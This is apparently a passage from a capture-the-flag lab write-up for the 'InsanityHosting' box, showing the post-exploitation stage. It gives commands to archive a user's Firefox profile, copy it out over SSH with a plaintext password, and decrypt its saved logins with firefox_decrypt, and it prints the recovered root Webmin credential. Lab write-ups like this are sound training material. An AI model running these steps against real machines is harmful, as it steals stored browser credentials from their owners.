Firefox
A Firefox profile has been identified by PEAS on the insanityhosting.vm host.
/Play/InsanityHosting/4-Post_Enumeration/attachments/{446B8134-8A88-4280-BF50-4215464D70A4}.png)
It’s located in the home directory of the current user; elliot
[elliot@insanityhosting ~]$ tar -czf firefox.tar.gz .mozilla/firefox
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ sshpass -p elliot123 scp elliot@insanityhosting.vm:~/firefox.tar.gz .
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ tar -xf firefox.tar.gzPackaged and transferred to Kali
Decryption
/Play/InsanityHosting/4-Post_Enumeration/attachments/{02EC39E9-ADDB-4D7D-8FDB-948A35AFD3EA}.png)
Using a decryption tool found online.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ python3 ~/Tools/firefox_decrypt/firefox_decrypt.py .mozilla/firefox
Select the Mozilla profile you wish to decrypt
1 -> wqqe31s0.default
2 -> esmhp32w.default-default
2
Website: https://localhost:10000
Username: 'root'
Password: 'S8Y389KJqWpJuSwFqFZHwfZ3GnegUa'A credential for the internal Webmin instance identified; root:S8Y389KJqWpJuSwFqFZHwfZ3GnegUa
This could also be a system credential for the root user.
Validating..